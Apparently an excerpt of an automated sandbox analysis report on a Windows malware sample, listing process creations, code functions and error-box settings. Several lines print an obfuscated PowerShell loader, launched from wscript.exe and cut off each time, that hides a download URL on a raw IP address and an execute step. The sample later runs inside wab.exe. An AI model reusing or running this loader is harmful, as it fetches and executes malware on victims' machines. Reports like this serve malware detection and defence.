AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 14_2_004044A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD346F0943 push E95AFFD0h; ret 2_2_00007FFD346F09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD346F09F3 push E95AFFD0h; ret 2_2_00007FFD346F09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD347C54AD push ebp; iretd 2_2_00007FFD347C5538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04EAEC78 pushfd ; retf 5_2_04EAEC79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07BE21A8 push eax; mov dword ptr [esp], ecx 5_2_07BE21B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07BE1FC8 push eax; mov dword ptr [esp], ecx 5_2_07BE21B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_097D6D41 push 00000012h; iretd 5_2_097D6D4F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_097DCBD5 push eax; iretd 5_2_097DCBDA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_21362806 push ecx; ret 10_2_21362819
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_21371219 push esp; iretd 10_2_2137121A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03A7CBD5 push eax; iretd 10_2_03A7CBDA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03A76D41 push 00000012h; iretd 10_2_03A76D4F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044693D push ecx; ret 14_2_0044694D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044DB70 push eax; ret 14_2_0044DB84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044DB70 push eax; ret 14_2_0044DBAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00451D54 push eax; ret 14_2_00451D61
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0044B090 push eax; ret 15_2_0044B0A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0044B090 push eax; ret 15_2_0044B0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00451D34 push eax; ret 15_2_00451D41
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00444E71 push ecx; ret 15_2_00444E81
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00414060 push eax; ret 16_2_00414074
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00414060 push eax; ret 16_2_0041409C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00414039 push ecx; ret 16_2_00414049
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004164EB push 0000006Ah; retf 16_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00416553 push 0000006Ah; retf 16_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00416555 push 0000006Ah; retf 16_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 15_2_004047CB
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
